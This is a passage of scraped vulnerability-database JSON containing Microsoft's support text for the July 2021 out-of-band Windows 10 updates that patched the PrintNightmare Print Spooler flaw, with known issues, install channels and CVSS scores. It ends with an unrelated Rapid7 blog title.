broadly deploy the new Microsoft Edge for business, see [Download and deploy Microsoft Edge for business](<https://www.microsoft.com/edge/business/download>). \nAfter installing this update, you might have issues printing to certain printers. Various brands and models are affected, primarily receipt or label printers that connect via USB.**Note **This issue is not related to [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) or [CVE-2021-1675](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675>).| This issue is resolved in KB5004237. \nAfter installing the May 25, 2021 (KB5003214) and June 21, 2021 (KB5003690) updates, some devices cannot install new updates, such as the July 6, 2021 (KB5004945) or later updates. You will receive the error message, \"PSFX_E_MATCHING_BINARY_MISSING\".| For more information and a workaround, see KB5005322. \nUniversal Windows Platform (UWP) apps might not open on devices that have undergone a Windows device reset. This includes operations that were initiated using Mobile Device Management (MDM), such as Reset this PC, Push-button reset, and Autopilot Reset. UWP apps you downloaded from the Microsoft Store are not affected. Only a limited set of apps are affected, including:\n\n * App packages with framework dependencies\n * Apps that are provisioned for the device, not per user account.\nThe affected apps will fail to open without error messages or other observable symptoms. They must be re-installed to restore functionality.| This issue is addressed in KB5015878 for all releases starting June 21, 2021 and later. \n \n## How to get this update\n\n**Before installing this update**Microsoft now combines the latest servicing stack update (SSU) for your operating system with the latest cumulative update (LCU). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.Prerequisite:For Windows Server Update Services (WSUS) deployment:\n\n * Install the May 11, 2021 update (KB5003173) before you install the latest cumulative update.\nFor offline Deployment Image Servicing and Management (**DISM.exe**) deployment:\n\n * If an image does not have the February 24, 2021 (KB4601382) or later cumulative update, install the January 12, 2021 SSU (KB4598481) and the May 11, 2021 update (KB5003173).\n**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| No| No longer available. \nMicrosoft Update Catalog| No| No longer available. \nWindows Server Update Services (WSUS)| No| No longer available. \n \n**If you want to remove the LCU**To remove the LCU after installing the combined SSU and LCU package, use the [DISM/Remove-Package](<https://docs.microsoft.com/en-us/windows-hardware/manufacture/desktop/dism-operating-system-package-servicing-command-line-options>) command line option with the LCU package name as the argument. You can find the package name by using this command: **DISM /online /get-packages**.Running [Windows Update Standalone Installer](<https://support.microsoft.com/en-us/topic/description-of-the-windows-update-standalone-installer-in-windows-799ba3df-ec7e-b05e-ee13-1cdae8f23b19>) (**wusa.exe**) with the **/uninstall **switch on the combined package will not work because the combined package contains the SSU. You cannot remove the SSU from the system after installation.\n\n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004945](<https://download.microsoft.com/download/6/0/4/6046cc97-919a-434d-86de-db2fe63580d0/5004945.csv>). For a list of the files that are provided in the servicing stack update, download the [file information for the SSU - version 19041.1081, 19042.1081, and 19043.1081](<https://download.microsoft.com/download/6/2/d/62d4d81c-0498-4abf-95e7-b9be18ddcabd/SSU_version_19041_1081.csv>). \n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-06T00:00:00", "type": "mskb", "title": "July 6, 2021\u2014KB5004945 (OS Builds 19041.1083, 19042.1083, and 19043.1083) Out-of-band", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-07-06T00:00:00", "id": "KB5004945", "href": "https://support.microsoft.com/en-us/help/5004945", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-19T10:52:08", "description": "None\n**6/15/21 \nIMPORTANT **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the machine. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**5/11/21** \n**REMINDER **Windows 10, version 1909 reached end of service on May 11, 2021 for devices running the Home, Pro, Pro for Workstation, Nano Container, and Server SAC editions. After May 11, 2021, these devices will no longer receive monthly security and quality updates that contain protection from the latest security threats. To continue receiving security and quality updates, Microsoft recommends updating to the latest version of Windows 10We will continue to service the following editions: Enterprise, Education, and IoT Enterprise.\n\n**11/19/20** \nFor information about Windows update terminology, see the article about the [types of Windows updates](<https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/standard-terminology-software-updates>) and the [monthly quality update types](<https://techcommunity.microsoft.com/t5/windows-it-pro-blog/windows-quality-updates-primer/ba-p/2569385>). To view other notes and messages, see the Windows 10, version 1909 update history home page.**Note **Follow [@WindowsUpdate](<https://twitter.com/windowsupdate>) to find out when new content is published to the release information dashboard.\n\n## Highlights\n\n * Updates a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>).\n\n## Improvements and fixes\n\nThis security update includes quality improvements. Key changes include:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the **RestrictDriverInstallationToAdministrators** registry setting to prevent non-administrators from installing signed printer drivers on a print server. For more information, see KB5005010.\nIf you installed earlier updates, only the new fixes contained in this package will be downloaded and installed on your device. \n\n**Windows Update Improvements**Microsoft has released an update directly to the Windows Update client to improve reliability. Any device running Windows 10 configured to receive updates automatically from Windows Update, including Enterprise and Pro editions, will be offered the latest Windows 10 feature update based on device compatibility and Windows Update for Business deferral policy. This doesn't apply to long-term servicing editions.\n\n## Known issues in this update\n\nMicrosoft is not currently aware of any issues with this update.\n\n## How to get this update\n\n**Before installing this update**Prerequisite:You must install the April 13, 2021 servicing stack update (SSU) (KB5001406) or the latest SSU (KB5003974) before installing the latest cumulative update (LCU). SSUs improve the reliability of the update process to mitigate potential issues while installing the LCU. For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and Servicing Stack Updates (SSU): Frequently Asked Questions.If you are using Windows Update, the latest SSU will be offered to you automatically. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update or Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update. \nWindows Update for Business| Yes| None. This update will be downloaded and installed automatically from Windows Update in accordance with configured policies. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5004946>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows 10, version 1903 and later**Classification**: Security Updates \n**File information**For a list of the files that are provided in this update, download the [file information for cumulative update 5004946](<https://download.microsoft.com/download/3/8/0/380275c2-0d42-4deb-a865-50595
Rapid7 2021 Wrap-Up: Highlights From a Year of Empowering the Protectors
